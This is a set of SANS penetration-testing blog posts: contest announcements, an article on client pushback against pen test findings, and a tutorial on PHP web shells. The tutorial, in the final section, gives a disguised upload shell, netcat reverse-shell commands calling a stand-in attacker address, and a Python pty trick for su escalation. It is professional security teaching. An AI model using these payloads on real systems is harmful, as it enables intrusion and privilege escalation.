SANS Pen Test Hackfest Twitter Contest

We’re delighted to announce a new Twitter-based contest here with a fantastic prize.  And, participating in this one is really easy.  Check it out.

On November 13 through 20, SANS will be running our second annual Pen Test Hackfest training event in Washington DC.  We throw everything we’ve got into this extra special event, including:

  • Two days of amazing, in-depth talks by leading minds of the industry, including the authors of some of the best pen test tools on the planet, including SET, Armitage, and more.
  • Six days of training, with five different classes to choose from.
  • Three nights of NetWars Tournament challenges for hands-on fun and learning.
  • One night of CyberCity missions, where you’ll be defending critical infrastructures against attacks, preventing city-wide mayhem.
  • Coin-a-palooza: A chance to earn up to FOUR SANS Pen Test coins for your collection.
  • One Super Secret Special Evening: On Nov 14, we’ll be taking a mind-blowing trip.

The prize for our new Twitter contest is free admission to the two-day session at the start of the Hackfest on Nov 13-14.  You’ll experience some great talks, learn super useful information, participate in a NetWars evening Nov 13, and join us on the Super Secret Special Evening Nov 14.

How do you enter?  It’s easy — just snap a picture of yourself with one of the items listed below and tweet the photo to  @pentesttips  with the hashtag  #SANSHackfest.  Contest runs August 1st – 15th, 2014:

– Photo of yourself holding a SANS Pen Test Challenge Coin (Just the front!!! Not the back with its sooper sekret cipher) or Coin Sticker
– Photo of yourself wearing a SANS Pen Test T-shirt or NetWars shirt
– Photo of yourself wearing the glowing NetWars T-shirts from last year’s SANS Pen Test Hackfest
– Photo of yourself with any SANS item (book, shirt, etc.)
– Photo of yourself with this SANS pen test website visible (in a browser, on a screen, or even printed out on paper)

Each person that tweets a photo will be entered into a drawing to win a FREE seat at the Pen Test Hackfest Summit Nov 13-14.  The contest ends on August 15th, 2014 and we will announce the winner on August 18, 2014. The more creative the photo, the better…anything goes, just keep it clean and family friendly.  Some more detailed rules follow below.

Have fun & good luck!

–Ed Skoudis.

Rules:
1. Entry: Contest begins on Friday, August 1st, 2014 and ends Friday, August 15th, 2014. Responses must be submitted by 9:00 pm EDT on August 15th.  Each participant may enter an arbitrary number of times for the challenge.

2. Prize: Each person that correctly submits a photo including the hashtag #SANSHackfest will be entered into a drawing to win a FREE seat at the Pen Test Hackfest Summit this November. SANS will choose only one winner.  The seat is transferable to another in the same organization/company. The winner will be chosen on August 18th and will be notified via Twitter.

3. Odds of Winning: The odds of winning the contest depend upon the total number of all eligible entries received in the contest period, regardless of method of participation.

4. Release of Liability: SANS is not responsible for lost, late, or unintelligible entries, lost connections, miscommunications, failed transmissions, other technical difficulties or failures.

Announcing the Awesome New SANS Brochure Challenge

Here’s some fun news.  SANS just released a new kind of challenge – one that unfolds from the pages of a SANS brochure itself.  Created by Jeff McJunkin and a group of challenge-writing collaborators, we launched it this week with the mailing of the SANS Network Security brochure for the upcoming conference in Las Vegas in October 2014.  This challenge will take you across many domains of knowledge, including (but not limited to!): infosec fundamentals, pen testing, digital forensics, steganography, social media, mobile devices, and much, much more, all wrapped up in some geeky fun!

You’ll enjoy all these areas and more from the comfort of your brochure (paper or pdf) and local computer, along with everyone’s favorite global network, the Internet itself. You’ll be able to advance all the way through this challenge from anywhere in the world. If this sounds a bit overwhelming, don’t worry!  We recommend you start on the challenge now, and have fun with it.

Regardless of whether you can make it to the conference in Vegas or not, you can still participate in the challenge and win prizes by working from the brochures or their pdfs.  If you receive SANS brochures in the mail, you should be on the lookout for the Network Security brochure in the mail this week for the challenge details on Page 2.  Or, skip the paper altogether and jump on sleuthing and hacking your way through the challenge by clicking on the image below to download the Network Security brochure.  The challenge starts on Page 2 in the section cleverly titled “SANS Brochure Challenge.”

Once you conquer the first challenge in the Network Security brochure, you’ll see other challenge components in the SANS Albuquerque brochure (shipped the week of 7/10/14, but downloadable here now), the SANS Baltimore brochure (shipped the week of 7/31/14, but downloadable here now), and the SANS Seattle brochure (shipped the week of 8/14/14, but downloadable here now) over the next few weeks.  We’ll post reminders about those brochures in this blog when they hit the mail as well.  You can get rolling and make some huge progress based on what’s in the Network Security (Vegas) brochure alone.

So, how can you win and earn the undying respect of all your friends? There are three ways to win, though for each of them you’ll need to finish the challenge. We’ll award prizes to the first person to complete the challenge, the person with the best technical write-up describing how they did it, and one lucky person who wins a random draw from all entries.

This innovative, quirky, and fun challenge itself will tell you where to send your answer when you conquer it!

What will you win?

The person with the best technical write-up will receive a signed copy of  the “Counter Hack Reloaded” book, as will the winner of the random drawing.  We’ll also tell everyone about your amazing work as a victor in this challenge!  And, the first person to finish the challenge will receive the GRAND PRIZE – a free four-month subscription to NetWars Continuous, valued at over $2,000! You’ll have plenty of opportunities to develop your skills practicing in this on-line cyber range, especially with our NetWars Continuous automated hint system to ensure a Stuck-Free™ experience!

Rules of Engagement for the brochure challenge:

  • No denial of service attacks
  • No brute force attacks – although you won’t gain access in this way, you could slow down the experience for other players
  • No attacks against the web servers or their underlying operating systems
  • No sharing of challenge links, hints, or write-ups before the contest deadline has passed

Have fun with our SANS first ever official brochure challenge!

–Jeff McJunkin, Ed Skoudis, and the SANS Team

Dealing with the Many Stages of Pen Test Result Grief – Part 2

By Ed Skoudis

In this series of articles, we’re looking at some of the grief that penetration testers often encounter when they deliver their results and recommendations.  Our premise?  You, a great pen tester, work your tail off to conduct a wonderful, high-value, technically awesome pen test.  The result?  Target system personnel vomit all over your findings, push back on your recommendation, and just plain don’t see the value of what you’ve done.  The series, which began with article one here, focuses on practical tips you can use to avoid such situations up front, or, if they do occur later on, methods for defusing the situation and demonstrating the real value you are providing.

Article 1 in the series sets the backdrop and talks about Stage 1: Denial and Stage 2: We Meant to Do It That Way.  Here in article 2, we’ll pick up where we left off by exploring Stage 3: The Blame Game (Blame the Messenger) and Stage 4: That’s Not FAIR!

Stage 3: The Blame Game (Blame the Messenger)

Target System Personnel Reviewing the Report: “You’ve actually caused the issue at hand by running your freaky-deaky ultra-scary hacking tools.  Something like that would never happen in a real-world attack.”

This complaint sometimes comes from target system personnel not understanding how widespread and common hacking tools are today and the value they can provide in actually improving security.  You can hardly blame them.  For some people outside of the information security community, hacking tools are mysterious, edgy, voodoo magick.  Compounding the problem, many penetration test reports reinforce the voodoo magick misperception, because they don’t go into any details about how the tools found or exploited the flaw.  In my work reviewing pen test reports, I see a lot of deliverables that blurt out critical findings as though they just fell out of the sky, with little information for target system personnel to understand the true nature of the risk they face.

To head this one off in advance, you as the penetration tester should try to help educate target system personnel by including some relatively small but very important details in your report.  Make sure your report includes the names of the tools you used during the test for each finding.  Also, for particularly critical findings, explain at a high-level the underlying technique your tool used to discover the finding, along with how common that technique is applied in the wild.  Explain how real-world attackers use the same or similar tools to exploit these kinds of flaws every day.  Your goal is to make the critical issues you’ve discovered real to your report readers, tying them to real-world threats.  These small tweaks to your report will not only help inform target system personnel about the validity of your findings, they will also help them better understand what they are up against in defending their environments.

That’s one form of the Blame Game that pen testers may encounter.  We’ll see another variation of the Blame Game in a follow-up article in this series, where target system personnel blame not the pen testers, but another organization or entity outside their control.

Stage 4: That’s Not FAIR!

Target System Personnel Reviewing the Report: “Well, well, well… Sure you can come up with such findings if you cheat. The only way someone could discover such a flaw is by utilizing some super secret inside knowledge, which we gave you in good faith at the outset of the pen test before you betrayed us, Benedict Arnold.  No real bad guy would ever be able to figure that out and mount such an attack.”

Here’s a classic response that comes up surprisingly often.  During the initial scoping of the project or during project update debriefings, target system personnel will almost always share information that proves extremely useful in finding juicy flaws during your penetration test.  They might mention an architectural problem, a broken process, a particularly weak system, or more, allowing you to find and exploit the crap out of the target environment.  When you report on your results, sometimes target system personnel turn on you and say, “That’s not FAIR!”

To deal with this, I always start a project by talking with target system security and operations personnel trying to defuse an inherent conflict.  You see, target system personnel sometimes fear pen testers (as they worry that we may accidentally break something like a bull in a china shop), and other times they just plain loathe us (as we look through their work to find flaws which could get them in trouble).  This mix of fear and loathing can make for… er… rather complex emotions during the test, to put it lightly.  At the outset of a project, I usually say in a nice way, “Look, we both have the same goal – to help improve the organization’s security and its operations.  Let’s work together to make that happen.”

I go even further, saying, “You know this environment better than I ever will… I’m sure there are some things you know that would help improve security, but you haven’t been able to get management to invest the resources needed to do so.  Use me.  I can be a vehicle by which you can move your organization to improving its security stance, if we work together.”  It’s a sincere pledge on my part, and being explicit about it up front can help you identify important issues early on during a project.  You are planting the seeds for a good working relationship with target system personnel so that you don’t find yourself with a “That’s Not FAIR” claim.

Then, of course, when you write up the report, you should point out those issues that were identified during the beginning of the project, emphasizing the importance of the issues and their associated defenses.  Only mention that you learned of the issues from the in-house team if the individuals on that team have agreed to such a mention.  You also have to show, in your report, how a real-world bad guy could find and exploit the security issue that was, for your pen test, kind of a “gimme” by target system personnel.  Help them to understand how real-world attackers working over months may find this same issue, which you modeled in your penetration test over the course of a week or two.

Even if you do all of this flawlessly, you may still hear a cry of “That’s Not FAIR!”  If this happens to you, remember to keep calm and never get your back up.  You are in the right, as long as you’ve stayed within scope, followed your rules of engagement, and utilized real-world attack techniques.

Here’s what I like to do when this occurs: When someone claims, “That’s Not FAIR,” I translate them in real time, in my head, using an internal voice that sounds like a bad voice over from an old kung fu movie to, “You have bested me with your impressive kung fu, and I congratulate you on your success. Please help me understand how you have done this great feat so that I can improve the security of my enterprise.”  Yeah, it’s a little wordy replacement for “That’s Not FAIR,” but it helps me smile instead of reacting negatively.  You can then proceed calmly to explain how a real-world attacker would find the associated issue using publicly available tools and information, along with your recommendations to help improve the organization’s security stance.

So, that’s Stage 3 and 4.  In part 3 of this series, we’ll discuss some tips to use when dealing with Stage 5 (“I don’t think that finding means what you think it means”) and Stage 6 (“Scope-a-Dope”).  Please stay tuned.

In the mean time, if you are interested in all things penetration test related, I’d love to see you take the SANS Security 560 course from me.

–Ed Skoudis
SANS Institute Fellow
SANS Penetration Testing Curriculum Lead
Author and Instructor, SANS Security 560: Network Pen Testing & Ethical Hacking

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Sneaky Stealthy SU in (Web) Shells

[In this article, the inimitable Tim Medin has some fun with PHP web shells, and merges together some clever ideas for interacting with them in a rather stealthier fashion using some Python kung fu! –Ed.]

By: Tim Medin

Here is the scenario: you have a server that allows you to upload an avatar. The site makes sure that the file ends with .jpg, .png, or .gif. Being the sneaky bugger you are (as a professional penetration tester operating within your scope and rules of engagement, naturally), you upload a file named shell.php.jpg, containing this delightful gem:

<?php @extract($_REQUEST); @die ($ctime($atime)); ?>

This file passes the extention check, but since it contains .php in the filename, many systems will execute it as a script. Also, this shell doesn’t include the telltale “/bin/sh”, “shell_exec”, or “system” strings and it looks like some sort of system commands associated with time to the untrained eye.

$ curl "http://Site/shell.php.jpg?ctime=system&atime=whoami"
apache

This by no means a new attack. The oldest reference I could find (in my vast two minutes of searching the deep web) is 2009, but the technique/attack is much older. Now that we have a shell (via web shell or command injection) on a Linux target, let’s look at how we can escalate permissions. A common next step is to establish a net cat session back the attacker’s system.

http://Site/shell.php.jpg?ctime=system&atime=nc+-nv+my.attack.er.ip+80+-e+/bin/sh

Or, if the target’s netcat doesn’t support -e, referred to as the GAPING_SECURITY_HOLE option, you could use the version below (as Ed Skoudis discovered at his Magical Olive Garden and documented here)

http://Site/shell.php.jpg?ctime=system&atime=mknod+/tmp/mypipe+p;+/bin/sh+</tmp/mypipe+|+nc+my.attack.er.ip+80+>/tmp/mypipe

Once we have the shell established, we need to upgrade the shell to use “sudo” or “su” as they interact with the shell in a unique way. Sterling Thomas posted an excellent list of upgrade techniques to the SANS GPWN mailing list. Once we use one of these techniques, we can use “sudo” and “su”.

What if you can’t or don’t want to have that outbound connection back to your box but you want to upgrade your shell in-line with your webshell? Sending data in HTTP POST requests is much more stealthy, as the posts typically aren’t logged and there isn’t that pesky outbound connection we saw with Netcat. Simple commands work fine this way.

$ curl "http://Site/shell.php.jpg" --data="ctime=system&atime=ls+-la"

We can send commands to the server, but we likely can’t use “sudo” as the web server’s account (such as apache) shouldn’t be in the /etc/sudoers file. This means we need to use “su” to upgrade. The “su” command has a “-c” option that allows us to specify a command. However, we have a problem — we need to run “su” and provide a password. What happens if we use echo to send the password into “su”? Let’s test it with our own shell.

$ echo password | su -c whoami
standard in must be a tty

Bah!  You might get the error “must be run from a terminal”, but either way we are out of luck with this technique.  The su command wants us to work from a terminal, not take in raw stuff via the shell’s Standard Input.

Now, here comes the trick. We can use a shell terminal trick that relies on Python to turn our non-terminal shell into a terminal shell.  Watch this:

$ (sleep 1; echo password) | python -c "import pty; pty.spawn(['/bin/su','-c','whoami']);"
root

BOOM!!

We need the sleep to pause just long enough for python to start and execute “su”. A second later (Python should be ready by then) the password is sent in, and we “got root”. We can now run whatever we want, as root.

We can use this technique to bruteforce the root password too. Of course, this method would also work with command injection too.

Now we can stay stealthier and have more access, two things I very much love!

Many of the concepts and techniques we discuss here covered in detail in the SANS flagship penetration testing course, SANS Security 560: Network Penetration Testing and Ethical Hacking, which covers end-to-end pen testing in depth with tons of hands-on labs.  Upcoming sessions include Boston in late July, Virginia Beach in late August, and Bangkok in August!

–Tim Medin
Counter Hack
@timmedin